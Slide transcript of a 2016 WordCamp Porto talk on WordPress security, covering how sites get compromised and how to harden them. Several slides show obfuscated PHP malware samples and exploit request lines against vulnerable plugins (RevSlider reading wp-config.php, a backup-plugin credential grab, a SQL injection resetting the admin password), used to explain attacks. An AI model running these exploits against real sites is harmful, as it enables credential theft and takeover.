
Security and Mobility - WordCamp Porto 2016


Slides from my talk at WordCamp Portugal 2016 about hellodev's experience with self-hosted WordPress websites and the security issues around them. Tips and other useful information inside.


Security and Mobility - WordCamp Porto 2016

  1. 1. $talk = "Segurança_e_mobilidade"; $where = date_default_timezone_set('Europe/Porto'); $date = '2016-05-14 12:00:00'; start(); /* Início */
  2. 2. /* Apresentação */ $who =“Marcel Schmitz”; $role =“CTO + web & mobile developer”; $where =“hellodev.us”; $email =“marcel@hellodev.us”;
  3. 3. /* Apresentação */
  4. 4. /* Primeiros contactos com sites comprometidos */ -rw-r--r-- 1 root root 3012 May 11 09:59 index.php /* Source: Wordfence March 2016 */
  5. 5. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden.
  6. 6. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden. $x =“NFbkn veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG $34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;
 $r=eval(gzinflate(str_rot13(base64_decode($x))));
  7. 7. /* Como uma instalação de WordPress pode ser comprometida */ // RESPONSIBLE FOR 70% OF THE ATTACKS
 $first =“plugin”; $second =“brute force”; // OTHER 30% $other = array(“code”, ”theme”, ”hosting”, ”file permissions”); /* Source: Wordfence March 2016 */
  8. 8. /* O que fazem depois? */ // MOST OF THEM
 $first_choice =“deface or take offline”; $second_choice =“send spam”; $third_choice =“seo spam”; $other =“redirect”; /* Source: Wordfence March 2016 */
  9. 9. /* Site comprometido por um plugin */ // MOST COMMON METHOD $using_method =“Local File Inclusion (LFI) attack.”; // EXAMPLE - INJECTED CODE <?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"} ["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"} ["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g x78x67ycx74x71x73"]="tx69tlx65"; ?>
  10. 10. /* Site comprometido por um plugin */ // EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER $wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php”); /* Source: http://finalphoenix.me/ */
  11. 11. /* Site comprometido por um plugin */ // EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR UPLOADING FILES $nonce = file_get_contents(“http://victim.com/wp-admin/admin.php? action=upgrade-plugin”);
 $credentials = file_get_contents(“http://victim.com/wp-admin/admin.php? action=updraft_ajax_handler&nonce=$nonce”); /* Source: http://finalphoenix.me/ */
  12. 12. /* Site comprometido por um plugin */ // EXAMPLE - EXECUTING SCRIPTS $script_to_execute =“phpinfo()”;
 $content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/ admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl= $script_to_execute”); /* Source: http://finalphoenix.me/ */
  13. 13. /* Site comprometido por um plugin */ // EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION) $context = … $query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;
 $chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php? page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context); /* Source: http://finalphoenix.me/ */
  14. 14. /* Site comprometido por um plugin */ // HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS? $simple_solution =“update, update, update!”; $other_tips = array (“dont use old plugins”,“search for news about security issues”,“take a look at the code”);
  15. 15. /* Site comprometido por brute force */ // PASSWORD GUESSING ATTACK $tips = array(“dont use obvious usernames”,“dont use simple passwords”,“create a new admin account”);
 $how_to_avoid =“two factor authentication”; $other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than x times”);
  16. 16. /* Site comprometido por outros motivos */ // SET THE CORRECT PERMISSIONS $folders =“0755”; $files =“0644”; $wp_config =“0444”; $htaccess =“0444”;
  17. 17. /* Site comprometido por outros motivos */ // SET THE CORRECT .HTACCESS CONTENT $things_you_can_do = array(“block IPs”,“protect files”,“allow certain file extensions from wp_content/*”);
  18. 18. /* Site comprometido por outros motivos */ // HAVE LATEST OS UPDATES INSTALLED if ($i_have_a_server() == true) { update_os(); }
  19. 19. /* Atualizar, sempre! */ // UPDATE PLUGINS, UPDATE CORE INSTALLATION, UPDATE THEMES $always_update = true;
  20. 20. /* Plugins que ajudam */ // SECURITY PLUGINS
 install_plugin_by_slug(‘wordfence’); install_plugin_by_slug(‘sucuri-scanner’); install_plugin_by_slug(‘better-wp-security’); // iThemes Security install_plugin_by_slug(‘google-authenticator’);
  21. 21. /* A nossa solução, aberta para todos */ // OUR PROBLEMS, YOUR PROBLEMS, SHARING A SOLUTION $new_approach = install_hellosys();
  22. 22. // MOBILE APP $name =“HELLOSYS”
  23. 23. /* A nossa solução, aberta para todos */ // ENTER BETA, STAY TUNED $url =“http://hellodev.us”;
  24. 24. $talk = "Segurança_e_mobilidade"; $where = date_default_timezone_set('Europe/Porto'); $date = '2016-05-14 12:20:00'; thank_you(); /* Fim */
